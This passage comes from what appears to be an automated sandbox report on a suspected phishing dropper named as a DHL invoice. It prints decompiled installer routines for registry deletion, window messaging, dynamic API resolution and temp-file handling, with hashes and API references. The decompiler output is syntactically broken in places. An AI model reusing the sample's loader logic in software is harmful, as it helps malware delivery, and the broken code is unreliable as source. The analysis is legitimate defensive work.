								_t59 = 0;
								goto L27;
							} else {
								switch( *((intOrPtr*)(_t46 * 4 +  &M6EF221E9))) {
									case 0:
										_t59 = 0;
										 *((intOrPtr*)(_t54 + 0x1020)) = 0;
										goto L27;
									case 1:
										_push(__esi);
										__eax = E6EF2135A();
										goto L18;
									case 2:
										_push(__esi);
										__eax = E6EF2135A();
										_pop(__ecx);
										 *__ebp = __eax;
										_a4 = __edx;
										goto L26;
									case 3:
										__eax = GlobalAlloc(0x40,  *0x6ef25040);
										 *(__edi + __ebx + 0x1034) = __eax;
										 *__ebp = __eax;
										__ebp = 0;
										__ecx =  *0x6ef25040;
										__eax = WideCharToMultiByte(0, 0, __esi,  *0x6ef25040, __eax,  *0x6ef25040, 0, 0);
										goto L27;
									case 4:
										__eax = E6EF212E1(__esi);
										 *(__edi + __ebx + 0x1034) = __eax;
										L18:
										_pop(__ecx);
										 *__ebp = __eax;
										goto L26;
									case 5:
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__edi + __ebx + 0x1034) = __eax;
										_push(__esi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										goto L26;
									case 6:
										__ebp = 0;
										if( *__esi != __bp) {
											_push(__esi);
											__eax = E6EF2135A();
											 *(__edi + __ebx + 0x1020) = __eax;
										}
										L27:
										_t47 = GlobalFree(_t58);
										_t55 = _a4;
										if(_t55 == 0) {
											return _t47;
										}
										_t53 =  !=  ? _t55 + 1 : 0;
										_t44 =  !=  ? _t55 + 1 : 0;
										goto L1;
									case 7:
										__ecx =  *(__edi + __ebx + 0x1030);
										__eax =  *0x6ef25038;
										 *(__edi + __ebx + 0x1030) - 1 = ( *(__edi + __ebx + 0x1030) - 1) *  *0x6ef25040;
										__ecx =  *0x6ef25038 + ( *(__edi + __ebx + 0x1030) - 1) *  *0x6ef25040 * 2;
										__eax = __ecx + 0x18;
										 *(__edx + 0x1020) = __eax;
										_push(__ecx);
										asm("cdq");
										_push(__edx);
										_push(__eax);
										__eax = E6EF2149E(__ecx);
										__esp = __esp + 0xc;
										goto L26;
								}
							}
						}
						_t45 = E6EF21548(_t49);
						L9:
						L10:
						_t58 = _t45;
						goto L11;
					}
					_t45 = E6EF21593();
					goto L10;
					L8:
					_t45 = E6EF212E1(0x6ef240e0);
					goto L9;
				}
			}

0x6ef2204a
0x6ef22051
0x6ef2205b
0x6ef2205e
0x6ef2205e
0x6ef22060
0x6ef22064
0x6ef22067
0x6ef22070
0x00000000
0x00000000
0x6ef2207a
0x6ef22083
0x6ef22089
0x6ef22093
0x6ef220ad
0x6ef220ad
0x6ef220b7
0x6ef220b7
0x6ef220c7
0x6ef220cf
0x6ef220da
0x6ef221bc
0x6ef221bc
0x00000000
0x6ef220e0
0x6ef220e0
0x00000000
0x6ef220e7
0x6ef220e9
0x00000000
0x00000000
0x6ef220f4
0x6ef220f5
0x00000000
0x00000000
0x6ef22103
0x6ef22104
0x6ef22109
0x6ef2210a
0x6ef2210d
0x00000000
0x00000000
0x6ef2212c
0x6ef22132
0x6ef22139
0x6ef2213c
0x6ef2213e
0x6ef2214c
0x00000000
0x00000000
0x6ef22116
0x6ef2211b
0x6ef220fa
0x6ef220fa
0x6ef220fb
0x00000000
0x00000000
0x6ef22158
0x6ef2215e
0x6ef2215f
0x6ef22166
0x6ef22167
0x6ef2216a
0x00000000
0x00000000
0x6ef22172
0x6ef22177
0x6ef22179
0x6ef2217a
0x6ef22187
0x6ef22187
0x6ef221be
0x6ef221bf
0x6ef221c5
0x6ef221cb
0x6ef221e6
0x6ef221e6
0x6ef221d8
0x6ef221db
0x00000000
0x00000000
0x6ef22190
0x6ef22197
0x6ef2219d
0x6ef221a4
0x6ef221a7
0x6ef221aa
0x6ef221b0
0x6ef221b1
0x6ef221b2
0x6ef221b3
0x6ef221b4
0x6ef221b9
0x00000000
0x00000000
0x6ef220e0
0x6ef220da
0x6ef2208c
0x6ef220aa
0x6ef220ab
0x6ef220ab
0x00000000
0x6ef220ab
0x6ef2207c
0x00000000
0x6ef220a0
0x6ef220a5
0x00000000
0x6ef220a5

APIs

GlobalFree.KERNEL32(00000000), ref: 6EF221BF

Part of subcall function 6EF212E1: lstrcpynW.KERNEL32(00000000,?,6EF2156A,?,6EF211C4,-000000A0), ref: 6EF212F1

GlobalAlloc.KERNEL32(00000040), ref: 6EF2212C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6EF2214C

Memory Dump Source

Source File: 00000000.00000002.11492715606.000000006EF21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EF20000, based on PE: true

Associated: 00000000.00000002.11492664043.000000006EF20000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492760898.000000006EF24000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492804171.000000006EF26000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ef20000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: da186b15655f80e698cfd7701c5617783ed6b447cb814c3f01522566d43fbd97
Instruction ID: ce1632d7fd75229d9ba7e2cfa3ed7b814fb7f097b4a4a160051d65dfda86e645
Opcode Fuzzy Hash: da186b15655f80e698cfd7701c5617783ed6b447cb814c3f01522566d43fbd97
Instruction Fuzzy Hash: D8415A72515605EFD700EFE8C864FEA77B8FB46340B40423EF9089F148D7725980CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040141E Relevance: 7.6, APIs: 5, Instructions: 82
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E0040141E(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v4;
				void* _v8;
				short _v524;
				int _v528;
				void* _v532;
				void* _v536;
				void* _v544;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t43;
				signed int _t45;

				_t45 = _a12 & 0x00000300;
				_t43 = _a12 & 0x00000001;
				_t27 = E004062D8(__eflags, _a4, _a8, _t45 | 0x00000009,  &_v532);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v524);
						_push(0);
						while(RegEnumKeyW(_v532, ??, ??, ??) == 0) {
							__eflags = _t43;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v532);
								return 0x3eb;
							}
							_t33 = E0040141E(__eflags, _v532,  &_v524, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v524);
							_push(_t43);
						}
						RegCloseKey(_v532);
						_t35 = E004068E6(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t45, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v528 = 0;
					if(RegEnumValueW(_v532, 0,  &_v524,  &_v528, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00401438
0x00401441
0x00401456
0x0040145d
0x0040146d
0x00401493
0x00401493
0x0040149c
0x0040149d
0x004014ce
0x004014a6
0x004014a8
0x00401503
0x00401507
0x00000000
0x0040150d
0x004014ba
0x004014bf
0x004014c1
0x00000000
0x00000000
0x004014c3
0x004014cc
0x004014cd
0x004014cd
0x004014dc
0x004014e4
0x004014eb
0x00000000
0x00401525
0x00000000
0x004014fb
0x00401477
0x00401491
0x00000000
0x00000000
0x00000000
0x00401491
0x00401530

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
RegCloseKey.ADVAPI32(?), ref: 004014DC
RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401507

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 30017b8bd83a5a7471793a7c8ba9a53ddb3d91c26afeeaccdb12cfd0c7e39771
Instruction ID: 21b5a5252aa063403de6f9026dc2c812d9767c74370f87ead0cd0c39fa3adcf8
Opcode Fuzzy Hash: 30017b8bd83a5a7471793a7c8ba9a53ddb3d91c26afeeaccdb12cfd0c7e39771
Instruction Fuzzy Hash: 3F218032108244BBD7219F51DC08FABBBADEFD9344F01043AF989A11B0D3399A14DA6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401EEA Relevance: 7.6, APIs: 5, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00401EEA(struct HWND__* __edx, intOrPtr _a16, WCHAR* _a20, signed int _a24, signed int _a28, intOrPtr _a40, signed short _a44, int _a48, signed int _a52, struct tagRECT _a80, signed int _a88, signed int _a92) {
				struct HWND__* _t21;
				signed int _t22;
				signed int _t23;
				void* _t35;
				signed int _t41;
				long _t42;
				intOrPtr _t43;
				int _t53;
				struct HWND__* _t55;

				_t49 = __edx;
				if((_a52 & 0x00000100) == 0) {
					_t21 = GetDlgItem(__edx, _a48);
				} else {
					E00403002(2);
				}
				_t55 = _t21;
				_t22 = _a52;
				_a28 = _t22 & 0x00000004;
				_t53 = _t22 & 0x00000003;
				_t41 = _t22 >> 0x0000001e & 0x00000001;
				_a24 = _t22 >> 0x1f;
				if((_t22 & 0x00010000) == 0) {
					_t23 = _a44 & 0x0000ffff;
				} else {
					_t23 = E0040303E(_t49, 0x11);
				}
				_a20 = _t23;
				GetClientRect(_t55,  &_a80);
				_t33 =  !=  ?  *0x4349f4 : 0;
				_t42 = LoadImageW( !=  ?  *0x4349f4 : 0, _a20, _t53, _a88 * _a24, _a92 * _t41, _a52 & 0x0000fef0);
				_t35 = SendMessageW(_t55, 0x172, _t53, _t42);
				if(_t35 != 0 && _t53 == 0) {
					DeleteObject(_t35);
				}
				if(_a40 >= 0) {
					_push(_t42);
					E0040661F();
				}
				_t43 = _a16;
				 *0x435ac8 =  *0x435ac8 + _t43;
				return 0;
			}

0x00401eea
0x00401ef2
0x00401f03
0x00401ef4
0x00401ef6
0x00401efb
0x00401f09
0x00401f0b
0x00401f19
0x00401f21
0x00401f27
0x00401f2a
0x00401f33
0x00401f3e
0x00401f35
0x00401f37
0x00401f37
0x00401f43
0x00401f4d
0x00401f7a
0x00401f88
0x00401f92
0x00401f9a
0x00401fa1
0x00401fa1
0x00401fac
0x00401fb2
0x004016b7
0x004016b7
0x00402ea1
0x00402ea5
0x00402eb7

APIs

GetDlgItem.USER32(?,?), ref: 00401F03
GetClientRect.USER32(00000000,?), ref: 00401F4D
LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
DeleteObject.GDI32(00000000), ref: 00401FA1

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 4ca5b3e5092630b07da66f14ef21835f456d21acd53533bfcf070e0f2a8088fe
Instruction ID: 799bb538699f0f6bb00644a204e03bb935fb5af8a8b8547909695eab986b8c59
Opcode Fuzzy Hash: 4ca5b3e5092630b07da66f14ef21835f456d21acd53533bfcf070e0f2a8088fe
Instruction Fuzzy Hash: 2A218072609302AFD340DF64DD85A6BB7E8EB88305F04093EF945E62A1D678DD40DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EF21F7B Relevance: 7.5, APIs: 5, Instructions: 38
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EF21F7B(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t11;

				_t11 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t11);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t11, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x6ef21f92
0x6ef21fa0
0x6ef21fab
0x6ef21fb6
0x6ef21fbf
0x6ef21fca

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6EF22B4C,00000000,00000808), ref: 6EF21F8C
GlobalAlloc.KERNEL32(00000040,00000000), ref: 6EF21F97
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6EF21FAB
GetProcAddress.KERNEL32(?,00000000), ref: 6EF21FB6
GlobalFree.KERNEL32(00000000), ref: 6EF21FBF

Memory Dump Source

Source File: 00000000.00000002.11492715606.000000006EF21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EF20000, based on PE: true

Associated: 00000000.00000002.11492664043.000000006EF20000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492760898.000000006EF24000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492804171.000000006EF26000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ef20000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 4c44a9ec3d5b88064da92a2a37fa3067fd2d22601f2e8093741238b7b8bd7c40
Instruction ID: fefe19b58ae9fb0a90f1b583746b9571f7e2810a11cfa99dcab4384372c50f89
Opcode Fuzzy Hash: 4c44a9ec3d5b88064da92a2a37fa3067fd2d22601f2e8093741238b7b8bd7c40
Instruction Fuzzy Hash: 7CF03032118118BFCA105AE7DD0CE57BE6CEBCB6FAB060215F619D51A0C6A66C818770

Uniqueness

Uniqueness Score: -1.00%

Function 00401DBA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401DBA(void* _a8, struct HWND__* _a12, intOrPtr _a16, struct HWND__* _a20, long _a28, void* _a32, intOrPtr _a36, intOrPtr _a56, signed int _a60) {
				signed char _t23;
				void* _t25;
				long _t26;
				int _t30;
				long _t34;
				intOrPtr _t35;
				int _t47;
				void* _t48;
				int _t52;
				void* _t53;
				int _t55;
				void* _t57;

				_t52 = E00403002(3);
				_a20 = _t52;
				_t34 = E00403002(4);
				_t23 = _a60;
				if((_t23 & 0x00000001) != 0) {
					__esi = E0040303E(__edx, 0x33);
					_a16 = __esi;
				}
				if((_t23 & 0x00000002) != 0) {
					_t34 = E0040303E(_t48, 0x44);
				}
				_push("true");
				if(_a36 != 0x21) {
					_t53 = E0040303E(_t48);
					_t25 = E0040303E(_t48);
					_t41 =  !=  ? _t25 : 0;
					_t43 =  !=  ? _t53 : 0;
					_t26 = FindWindowExW(_a12, _t34,  !=  ? _t53 : 0,  !=  ? _t25 : 0);
					goto L12;
				} else {
					_a20 = E00403002();
					_t30 = E00403002(2);
					_t47 = _a60 >> 2;
					if(_t47 == 0) {
						_t26 = SendMessageW(_a20, _t30, _t52, _t34);
						L12:
						_a28 = _t26;
					} else {
						SendMessageTimeoutW(_a20, _t30, _t52, _t34, _t55, _t47,  &_a28);
						asm("sbb ebx, ebx");
						_t26 = _a28;
						_a16 = _t34 + 1;
					}
				}
				if( *((intOrPtr*)(_t57 + 0x28)) >= _t55) {
					_push(_t26);
					E0040661F();
				}
				_t35 = _a16;
				 *0x435ac8 =  *0x435ac8 + _t35;
				return 0;
			}

0x00401dc1
0x00401dc5
0x00401dce
0x00401dd0
0x00401dd8
0x00401de1
0x00401de7
0x00401de7
0x00401ded
0x00401df6
0x00401df6
0x00401dfd
0x00401dff
0x00401e57
0x00401e59
0x00401e63
0x00401e6c
0x00401e75
0x00000000
0x00401e01
0x00401e08
0x00401e0c
0x00401e17
0x00401e1c
0x00401e48
0x00401e7b
0x00401e7b
0x00401e1e
0x00401e2c
0x00401e34
0x00401e36
0x00401e3b
0x00401e3b
0x00401e1c
0x00401e83
0x00401afd
0x004016b7
0x004016b7
0x00402ea1
0x00402ea5
0x00402eb7

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48

Strings

!, xrefs: 00401DF8

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 91d7549d19bfd9567b9db0d62f4607727a13d94ab572956bc1fd2bc583f7e011
Instruction ID: 1d489b1cab37c72f7a9fe7ae17229530812e46ff9257658ed8c6d6ee4a6b2e26
Opcode Fuzzy Hash: 91d7549d19bfd9567b9db0d62f4607727a13d94ab572956bc1fd2bc583f7e011
Instruction Fuzzy Hash: 4F21F471609301AFE714AF21C886A2FBBE8EF84755F00093FF585A61E0D6B99D05CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EF21F1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EF21F1E(intOrPtr _a4, WCHAR* _a8) {
				intOrPtr _t11;
				intOrPtr _t19;
				WCHAR* _t21;

				_t11 = _a4;
				if( *((intOrPtr*)(_t11 + 4)) != 1) {
					_t21 = _a8;
					_t13 =  ==  ? 0x6ef240d8 : L"error";
					lstrcpyW(_t21,  ==  ? 0x6ef240d8 : L"error");
				} else {
					_t19 =  *((intOrPtr*)(_t11 + 0x1c98));
					if(( *(_t11 + 0x1010) & 0x00000100) != 0) {
						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x100c)) + 1));
					}
					_t21 = _a8;
					wsprintfW(_t21, L"callback%d", _t19);
				}
				return _t21;
			}

0x6ef21f1e
0x6ef21f29
0x6ef21f5c
0x6ef21f6c
0x6ef21f71
0x6ef21f2b
0x6ef21f35
0x6ef21f3b
0x6ef21f43
0x6ef21f43
0x6ef21f46
0x6ef21f51
0x6ef21f57
0x6ef21f7a

APIs

wsprintfW.USER32 ref: 6EF21F51
lstrcpyW.KERNEL32(?,error), ref: 6EF21F71

Strings

callback%d, xrefs: 6EF21F4B
error, xrefs: 6EF21F67, 6EF21F6F

Memory Dump Source

Source File: 00000000.00000002.11492715606.000000006EF21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EF20000, based on PE: true

Associated: 00000000.00000002.11492664043.000000006EF20000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492760898.000000006EF24000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492804171.000000006EF26000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ef20000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: lstrcpywsprintf
String ID: callback%d$error
API String ID: 2408954437-1307476583
Opcode ID: 20eab1d434b83b565e81325d81807e297e723d64426f2e0e74647356c48ae604
Instruction ID: 9d6b1855a4f8e46e4e19ed24658db80b51dbe9d04eef83bfd48881cb90504c64
Opcode Fuzzy Hash: 20eab1d434b83b565e81325d81807e297e723d64426f2e0e74647356c48ae604
Instruction Fuzzy Hash: 5AF08C35204110AFD704CBC8D968EBA73A5EFCA310F0581B8F9599F211C7B1AC868B99

Uniqueness

Uniqueness Score: -1.00%

Function 00406556 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00406556(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x4092b0);
				}
				return _t9;
			}

0x00406557
0x00406565
0x00406566
0x00406571
0x00406579
0x00406579
0x00406582

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CC3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 0040655C
CharPrevW.USER32(?,00000000), ref: 00406567
lstrcatW.KERNEL32(?,004092B0), ref: 00406579

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406556

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: fdfa961eb15b44997f3f2a02f7ac6fdf64fbe3aae0b57c1f36678e5d22b7198e
Instruction ID: 519304617d09d62b109db9489078dc762d93bb7b848864bf6502fc90c90d6087
Opcode Fuzzy Hash: fdfa961eb15b44997f3f2a02f7ac6fdf64fbe3aae0b57c1f36678e5d22b7198e
Instruction Fuzzy Hash: 3BD05E31502521BBC7029B64AD08D9B7BBCEF46301301446AFA41B3165C7745D41C7ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040285F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040285F(intOrPtr* __edi, void* __ebp, void* _a12, signed int _a20, intOrPtr _a36, void* _a44, intOrPtr _a48, void* _a72, intOrPtr _a80) {
				void* _v4;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr* _t31;
				void* _t33;
				int _t36;
				void* _t40;
				void* _t42;

				_t40 = __ebp;
				_t31 = __edi;
				_t29 = _a36;
				_t30 = _a48;
				_a80 = _t30;
				_t27 = 1;
				_a20 = 0 | _t29 == 0x00000038;
				if(_t30 == 0) {
					if(_t29 != 0x38) {
						_t36 = lstrlenW(E0040303E(_t30, 0x11)) + _t15;
					} else {
						E0040303E(_t30, 0x21);
						E00406469("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp", 0x40b908, 0x400);
						_t42 = _t42 + 0xc;
						_t36 = lstrlenA(0x40b908);
					}
				} else {
					 *0x40b908 = E00403002(1);
					_pop(_t29);
					_t36 = (_a20 ^ 1) + 1;
				}
				if( *_t31 != _t40) {
					_t33 = E00406C25(_t31);
					if(( *(_t42 + 0x14) |  *(_t42 + 0x50)) != 0 ||  *((intOrPtr*)(_t42 + 0x34)) == _t40 || E00406484(_t33, _t33) >= 0) {
						if(E00406A0B(_t29, _t33, ?str?, _t36) != 0) {
							_t27 =  *((intOrPtr*)(_t42 + 0x10));
						}
					}
				}
				 *0x435ac8 =  *0x435ac8 + _t27;
				return 0;
			}

0x0040285f
0x0040285f
0x0040285f
0x00402865
0x0040286c
0x0040287a
0x0040287b
0x00402881
0x0040289c
0x004028d2
0x0040289e
0x004028a0
0x004028b0
0x004028b5
0x004028bf
0x004028bf
0x00402883
0x0040288f
0x00402895
0x00402896
0x00402896
0x004028d7
0x004028e3
0x004028ed
0x00402912
0x00402ea1
0x00402ea1
0x00402912
0x004028ed
0x00402ea5
0x00402eb7

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll), ref: 004028B9

Strings

C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll, xrefs: 00402870, 0040288F, 004028AA, 004028B8, 00402905
C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp, xrefs: 004028AB

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

